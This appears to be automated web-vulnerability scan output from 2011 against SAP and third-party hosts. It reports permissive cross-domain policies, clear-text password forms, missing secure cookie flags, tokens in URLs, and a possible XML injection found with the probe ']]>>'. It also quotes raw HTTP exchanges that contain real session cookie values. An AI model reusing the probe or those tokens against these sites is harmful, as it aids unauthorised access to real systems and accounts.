Content-Type: text/xml
Last-Modified: Mon, 31 Jan 2011 14:40:15 GMT
Accept-Ranges: bytes
ETag: "66f151c654c1cb1:0"
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:29 GMT
Connection: close
Content-Length: 765
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.sapphirenow.com
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/xml
Date: Sat, 15 Oct 2011 14:23:03 GMT
Accept-Ranges: bytes
ETag: "fce0a340e329cc1:0"
Connection: close
Last-Modified: Mon, 13 Jun 2011 16:02:10 GMT
X-Powered-By: ASP.NET
Content-Length: 331
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: omnituremarketing.d1.sc.omtrdc.net
Response
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 13:47:21 GMT
Server: Omniture DC/2.0.0
xserver: www337
Connection: close
Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: sap.112.2o7.net
Response
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:24:58 GMT
Server: Omniture DC/2.0.0
xserver: www379
Connection: close
Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: static.2mdn.net
Response
HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 15 Oct 2011 14:24:55 GMT
Expires: Sun, 16 Oct 2011 14:24:55 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
Request
GET / HTTP/1.1
Host: www.sapbusinessoptimizer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:04:28 GMT
Server: Apache
Set-Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12285
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Home</title> <meta ...[SNIP]... </ul>
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.sdn.sap.com/irj/scn/downloads
The form contains the following password field:
j_password
Request
GET /irj/scn/downloads HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
SDN_RES_KEY: /webcontent/uuid/087fe75d-0501-0010-11bf-80f5c43d4f0c
Expires: 0
Date: Sat, 15 Oct 2011 15:04:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=scn; Path=/
Content-Length: 61519
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.sdn.sap.com/irj/scn/index
The form contains the following password field:
j_password
Request
GET /irj/scn/index HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
SDN_RES_KEY: /webcontent/uuid/10956870-6186-2b10-86ab-e0bbdc47e11f
Expires: 0
Date: Sat, 15 Oct 2011 15:04:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=scn; Path=/
Content-Length: 58094
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.sdn.sap.com/irj/scn/logon
The form contains the following password field:
j_password
Request
GET /irj/scn/logon HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:04:50 GMT
Content-Length: 21956
Connection: close
Set-Cookie: PortalAlias=scn; Path=/
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.sdn.sap.com/irj/sdn/logon
The form contains the following password field:
j_password
Request
GET /irj/sdn/logon HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:04:54 GMT
Content-Length: 21956
Connection: close
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.sdn.sap.com/irj/sdn/mypoints
The form contains the following password field:
j_password
Request
GET /irj/sdn/mypoints HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:05:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/
Content-Length: 44998
XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.
This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the role the relevant input plays within the application's functionality, to determine whether it is indeed vulnerable.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Sat, 15 Oct 2011 14:23:01 GMT
Connection: close
Connection: Transfer-Encoding
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Content-Length: 231
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Sat, 15 Oct 2011 14:23:01 GMT
Connection: close
Connection: Transfer-Encoding
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Content-Length: 231
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Sat, 15 Oct 2011 14:23:01 GMT
Connection: close
Connection: Transfer-Encoding
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Content-Length: 231
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:15:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: itvisitorid10002109824374=Kd30fNBLaa|M7bgHDDi|fvis10002109824374=Zj1odHRwcyUzQS8vd3d3LnNhcC5jb20vc21lL2NvbnRhY3RzYXAvaW5kZXguZXB4JmI9Q29udGFjdCUyMFNBUA==|T|T|T|T|8M8o078HsM|T; path=/; domain=.analytics.yahoo.com
Set-Cookie: itsessionid10002109824374=Kd30fNBLaa|fses10002109824374=; path=/; domain=.analytics.yahoo.com
TS: 0 205 dc4_ird
Pragma: no-cache
Expires: Sat, 15 Oct 2011 15:15:24 GMT
Cache-Control: no-cache, private, must-revalidate
Content-Length: 45
Accept-Ranges: bytes
Tracking-Status: fpc site tracked
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /visitor/addons/deploy2.asp?site=37021986&d_id=1&default=simpleDeploy HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Referer: https://www.sap.com/sme/contactsap/index.epx
Host: sales.liveperson.net
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:27:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 11 Oct 2011 14:31:36 GMT
Content-Length: 46014
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDASQTAASD=EFCBMEDCJGOGKJJDOJPEIKJJ; path=/
Cache-control: public, max-age=3600, s-maxage=3600
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /visitor/addons/deploy2.asp?site=37021986&d_id=1&default=simpleDeploy HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: sales.liveperson.net
If-Modified-Since: Tue, 11 Oct 2011 14:31:36 GMT
Connection: Keep-Alive
Cookie: ASPSESSIONIDAQTARCRC=MIIACKDCJHLJIMCHEDDAEOPL; LivePersonID=LP i=5140389589811,d=1318691628
Response
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:27:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 11 Oct 2011 14:31:36 GMT
Content-Length: 46014
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSQQSRQRS=KCFLHIDCADKIDENMHBAIHMGO; path=/
Cache-control: public, max-age=3600, s-maxage=3600
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: sapphire-nowmadrid.sapevents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=961013;expires=Mon, 07-Oct-2041 14:35:04 GMT;path=/
Set-Cookie: CFTOKEN=cb2412da3e988c3-0801EEF5-0494-7B81-1E70242D17ED02CD;expires=Mon, 07-Oct-2041 14:35:04 GMT;path=/
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:35:03 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><script type="text/jav ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wiki/display/HOME HTTP/1.1
Host: wiki.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Moved Temporarily
Server: SAP NetWeaver Application Server 7.20 / AS Java 7.20
sdn_uid: Guest
sdn_guid: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
sdn_visit: QUMxMDU0MDgtMTMzMDgxNzBFNTktQUNBQzA5QTU4MkExRkM0NA==
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-confluence-request-time: 1318690688602
x-confluence-cluster-node: Member(Id=1, Timestamp=2011-10-09 03:06:04.333, Address=172.16.84.8:8088, MachineId=59400, Location=process:23847@spwdfvml0204)
Location: https://wiki.sdn.sap.com:443/wiki/display/HOME/FAQ
Content-Length: 1751
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:58:08 GMT
Connection: close
Set-Cookie: saplb_*=(J2EE8243320)8243350; Version=1; Path=/
Set-Cookie: JSESSIONID=8zWp1LE9zVQKhsRFGYO-DyFbDhcIMwGWyH0A_SAPgKRDRzD6Pucfy_Alqw7AWMYs; Version=1; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>302 Found</title> <style> td {font-family : Arial, Tahoma, Helvetica, sans-serif; font-size : 14px;}
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/37021986/?&site=37021986&cmd=mTagKnockPage&lpCallId=953043236838-236721785208&protV=20&lpjson=1&id=2404879032&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-sap-sme-us-en-1%7ClpMTagConfig.db1%7ClpChatButtonDiv1%7C%23voice-sales-sap-sme-us-en-1%7ClpMTagConfig.db1%7ClpVoiceButtonDiv1%7C HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: sales.liveperson.net
Connection: Keep-Alive
Cookie: ASPSESSIONIDAQTARCRC=MIIACKDCJHLJIMCHEDDAEOPL
Response
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:27:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=6638045003516868152; path=/hc/37021986
Set-Cookie: HumanClickKEY=6638045003516868152; path=/hc/37021986
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 15 Oct 2011 15:27:11 GMT
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Content-Length: 33211
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: training.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /WebResource.axd HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html
Location: /errorpage.epx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:25 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:25 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:25 GMT
Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/errorpage.epx">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /contactsap/contact_warning.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3471
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:04 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:04 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:31 GMT
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /contactsap/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 126
Content-Type: text/html; charset=utf-8
Location: /host.epx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:01 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:01 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:04:01 GMT; path=/
Set-Cookie: pmereturnurl=%2fhost.epx; domain=.sap.com; path=/
Set-Cookie: pmelayerurl=%2fcontactsap%2findex.epx%3fpmelayer%3dtrue; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:04 GMT
Connection: close

<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/host.epx">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /profile/login.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 126
Content-Type: text/html; charset=utf-8
Location: /host.epx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:40 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:40 GMT; path=/
Set-Cookie: pmereturnurl=%2fhost.epx; domain=.sap.com; path=/
Set-Cookie: pmelayerurl=%2fprofile%2flogin.epx%3fpmelayer%3dtrue; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:39 GMT
Connection: close

<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/host.epx">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /profile/warning.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5057
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:52 GMT
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the secure flag set:
SDNSTATE=526651564.14340.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:21:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 15 Oct 2011 14:21:18 GMT
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 119
HTTP/1.1 302 Moved Temporarily
Date: Sat, 15 Oct 2011 14:55:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Location: http://sales.liveperson.net/hc/37021986/?cmd=file&file=visitorWantsToTalk&site=37021986&visitor=546022977410&msessionkey=449600187523043155&SV!EngageRoom=sales-sap-general-us-en&SV!chat-button-name=voice-sales-sap-general-us-en-1&SV!chat-button-room=voice-sales-sap-general-us-en-1&referrer=(button%20dynamic-button:voice-sales-sap-general-us-en-1(SAP%20Business%20Management%20Software%20Solutions%2C%20Applications%20and%20Services%20%7C%20SAP))%20http%3A//www.sap.com/index.epx&visitor=546022977410&msessionkey=449600187523043155
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:13:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 15 Oct 2011 15:13:52 GMT
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Content-Length: 119
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
Request
GET / HTTP/1.1
Host: www.sapbusinessoptimizer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:04:28 GMT
Server: Apache
Set-Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Home</title> <meta ...[SNIP]... </ul>
